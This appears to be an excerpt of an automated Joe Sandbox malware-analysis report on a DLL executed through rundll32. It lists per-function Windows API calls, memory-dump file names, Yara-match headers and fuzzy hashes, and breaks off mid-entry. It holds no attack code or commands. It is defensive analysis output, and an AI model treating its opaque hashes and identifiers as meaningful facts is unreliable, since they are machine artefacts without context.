                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2161412305-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                      • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1615547351-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                        • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                      • __strdup.LIBCMT ref: 1001514C
                                                                                                                      • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4206445780-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                      • _swprintf.LIBCMT ref: 10017768
                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4210924919-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3354205298-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                      • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                      • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3704204646-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetFocus.USER32 ref: 10015607
                                                                                                                      • GetParent.USER32(?), ref: 10015615
                                                                                                                      • SendMessageA.USER32 ref: 10015628
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211600527-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2353593579-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                        • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                      • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Item
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 369458955-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                      • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3384502665-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                        • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                      • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                      • __lock.LIBCMT ref: 1003A581
                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                      • InterlockedIncrement.KERNEL32(02621520), ref: 1003A5C9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2880340415-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,59F9C18A), ref: 1001DCB3
                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,59F9C18A), ref: 1001DCC0
                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,59F9C18A), ref: 1001DCDB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                      • Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
                                                                                                                      • Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                      • Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ActiveEnable$FreeResource
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 253586258-0
                                                                                                                      • Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                      • Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
                                                                                                                      • Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                      • Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                      • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                        • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                        • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 685759847-0
                                                                                                                      • Opcode ID: d44be934c2ef75bd78d99a79b72ea99719dbba6c3db094d6346c85c7022cb1da
                                                                                                                      • Instruction ID: 8d1cfe8ad11ec7d0de67206570733d2bfe4fd9a2d1bcb630a2e9799106cb1609
                                                                                                                      • Opcode Fuzzy Hash: d44be934c2ef75bd78d99a79b72ea99719dbba6c3db094d6346c85c7022cb1da
                                                                                                                      • Instruction Fuzzy Hash: F0E0ED318942B4CBEB04EB20EDC83993BE8FB46305F524526D04693165DF346C99DE62
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 1473721057-3887548279
                                                                                                                      • Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                      • Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
                                                                                                                      • Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                      • Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 431132790-2766056989
                                                                                                                      • Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                      • Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
                                                                                                                      • Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                      • Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                      • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                        • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                        • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                        • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                        • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                      • String ID: %s.dll
                                                                                                                      • API String ID: 3444012488-3668843792
                                                                                                                      • Opcode ID: 329f67baf803e57e750ff7b4698f50556b81caf0c39a54e087e53f6ada59587b
                                                                                                                      • Instruction ID: 642a70e52bf11b7de8cb7bbdb6da5a8b8236a488639b363106a5e3ee5626d218
                                                                                                                      • Opcode Fuzzy Hash: 329f67baf803e57e750ff7b4698f50556b81caf0c39a54e087e53f6ada59587b
                                                                                                                      • Instruction Fuzzy Hash: B701B971A10118BFDF09DB74DD86AEE73B8DF04B01F0105E9EA02DB140EEB1EB448661
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4100373531-0
                                                                                                                      • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                      • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                      • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2949335588-0
                                                                                                                      • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                      • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
